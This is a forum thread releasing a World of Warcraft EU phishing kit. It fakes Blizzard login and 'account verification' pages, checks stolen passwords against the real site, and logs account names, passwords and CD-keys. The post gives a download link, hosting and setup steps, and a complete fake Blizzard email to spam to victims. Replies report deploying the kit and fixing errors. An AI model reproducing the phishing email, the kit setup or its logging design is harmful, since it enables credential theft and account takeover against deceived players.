[RELEASE] Login and Account "verification" page w/ check [EU]

[Drakke]

Hello everyone! This is my first try on contributing so I hope you like it :P
I want to state first of all that this is not entirely my work. The page layout and basic code of the webpage design and build-up is done by Moji and I owe Apoc a lot of the credits too for his account checker.

INTRODUCTION
I've been working very briefly with all the phishing sides and set up one myself not long ago. This is mostly a copy of Moji's web phisher, and I used his side as a template and made only a few changes which I will mention later in my post. When Apoc released his account check functionality tool many people were asking how they should put this piece of code to use. I sat down and did so, and here it is for all of you. Enjoy!

THE CHANGES
This side is practically what Moji uploaded here: http://www.mmowned.com/forums/wow-sc...hing-scam.html with a few changes. These changes are as follows:

1. Account Check Functionality tool has been implemented into the login page, and if the user types in a wrong password it will lead him to the "Error" page saying Incorrect Password. If the user types the right password and enters account information that is actually true, he is led on to the account verification page and the account name and password is logged.

2. I have polished the Account Verification page itself. There is no more "Additional information" but instead I've added the ability to type in a Wrath of the Lich king CD-key, which is also logged.

3. I've made it European. I will be releasing a US version soon.

DOWNLOAD LINK
Use the following link to download the phisher:
- MEGAUPLOAD - The leading online storage and file delivery service



SETTING UP YOUR PHISHER
This is pretty straight forward. Upload all the files in their respective folders on a webside of your choice. (!!NOTE!! - Your hoster needs to have cURL enabled!)
I myself is using Free Hosting With No Ads | 50gigs.net for this purpose.
It works almost like ripway and you get a free .co.cc domain on top.

Once you've uploaded the files the side is ready to phish up everyone you send to it. Happy hunting!

THE MEANING OF THE PHISHER
That's all good, but how does it work and how are you supposed to use it? This phisher is designed to be used against people selling their accounts or people who are in trouble with the EULA and/or blizzard. Use a fake emailer like holypage and send them an email from Blizzard saying:

Code:

Greetings,
<br><br>
An investigation of your World of Warcraft account has found strong evidence that the account in question is being sold or traded.
As you may not be aware of, this conflicts with Blizzard's EULA under section 4 Paragraph B which can be found here:
<a href=http://www.wow-europe.com/en/legal/eula.html target="_blank"> WoW -> Legal -> End User License Agreement </a>
<br>
and Section 8 of the Terms of Use found here: <br>
<a href=http://www.wow-europe.com/en/legal/termsofuse.html target="_blank"> WoW -> Legal -> Terms of Use</a><br><br>
The investigation will be continued by Blizzard administration to determine the action to be taken against your account.
If your account is found violating the EULA and Terms of Use, your account can, and will be suspended/closed/or terminated. <br>
In order to keep this from occurring, you should immediately verify that you are the original owner of the account.
<br><br>
To verify your identity please visit the following webpage: <br>
<a href=http://YOURWEBSIDEHERE.co.cc target="_blank">https://www.wow-europe.com/login/login?service=https%3A%2F%2Fwww.wow-europe.com%2Faccount%2Findex.html</a><br>
Only Account and Billing Management will be able to assist with account retrieval issues.
Thank you for your time and attention to this matter, and your continued interest in World of Warcraft. <br>
<br><br>
Sincerely,
<br><br>
Account and Billing Management<br>
Blizzard Entertainment<br>
<a href= http://us.blizzard.com/support/article/21505 target="_blank">
</a>

Now spam this email to everyone you want to get into your trap, just remember to change the webside to yours. Remember that this email is also made for European users. I will be making a US version soon.

There are 2 html pages by standard set as log files. One of the files is the log for the login screen and one for the verification page itself.
/accinflog.html - This is where the account name and password from the login page is logged to. These are never wrong when entered as they're checked by the official (EU) wow side.
/totalinfolog.html - This is where all the account info that the user enters after logging in goes to. This information is unchecked and the user can write whatever he wants in the fields, but hey - he already checked if the login screen was a fake hopefully, and hopefully he won't question the next page

If I've missed something out, please check with Moji's post linked in the credits. If you can't find anything in his guide (My guide is pretty rough) then feel free to ask me here!

CREDITS
Big thanks to Moji for making a great phishing side (http://www.mmowned.com/forums/wow-sc...hing-scam.html)
Also a big thanks to Apoc for making the account checking tool (http://www.mmowned.com/forums/wow-sc...-phishers.html)


// Drakke

[singoe]

Looks nice, ill try it out later

[Rarmann]

Very very nice!

Just finished uploading all files to the server! Will post back on how things work out

+rep for you!

[Rarmann]

Btw, i suspect totalinfolog.html to be the place where it all ends up?

[Zeluous]

Sorry to say, I got this when i pressed login:
Fatal error: Call to undefined function: curl_init() in \\192.168.0.16\webfiles\files\2009-1\2958196\accountverification.php on line 115

[Apoc]

Sorry to say, I got this when i pressed login:
Fatal error: Call to undefined function: curl_init() in \\192.168.0.16\webfiles\files\2009-1\2958196\accountverification.php on line 115

Your webserver doesn't support cURL apparently.

[Zeluous]

Well, I can confirm that

Big thanks to Moji for making a great phishing side (http://www.mmowned.com/forums/wow-sc...hing-scam.html (New Website Phishing Scam))

works cause thats what im using

[Drakke]

Your webserver doesn't support cURL apparently.

^ What he said I'm personally using Free Hosting With No Ads | 50gigs.net as they have a side that looks a lot like Ripway in the way it administrates files and it supports cURL.

Ripway does NOT support cURL, if thats what you're using (Not many sides do really.. At least the free ones..)

Btw, i suspect totalinfolog.html to be the place where it all ends up?

totalinfolog.html is where the info from the verification page ends up, which is the page where the user types in all his/her account information..
accinflog.html is the log for the login page itself, all the accounts that are in this file is confirmed and assured to be real information. Note: The user could have changed password afterwards though :P

[Pablofloyd]

Nice guide +rep

[Rarmann]

totalinfolog.html is where the info from the verification page ends up, which is the page where the user types in all his/her account information..
accinflog.html is the log for the login page itself, all the accounts that are in this file is confirmed and assured to be real information. Note: The user could have changed password afterwards though :P

Ah ok Thanks for updating me

[afilol]

Cheers mate ! tryed to put some things that we're here but dident work but this one does cheers !

[Ketels]

Cool thanks

[khaled1994]

hey..my my login page isnt working everytime i log on account,pass it says error wrong password is that from the new patch?(it was working well)
thx

[Drakke]

hey..my my login page isnt working everytime i log on account,pass it says error wrong password is that from the new patch?(it was working well)
thx

My login page is still working perfectly.. Keep in mind this is a EU version and the Account name and pass has to actually work on wow-europe.com, and therefore only works on EU accounts.. (Since the Eu and US login screens are different from each other)..

If you keep having problems, please write again
Oh and another note: I just read that banned accounts no longer work.. It seems they've removed all the perma banned account for good..

[Drakz]

Works Like A Charm,

Well Done, would +Rep but im still a lousy leacher....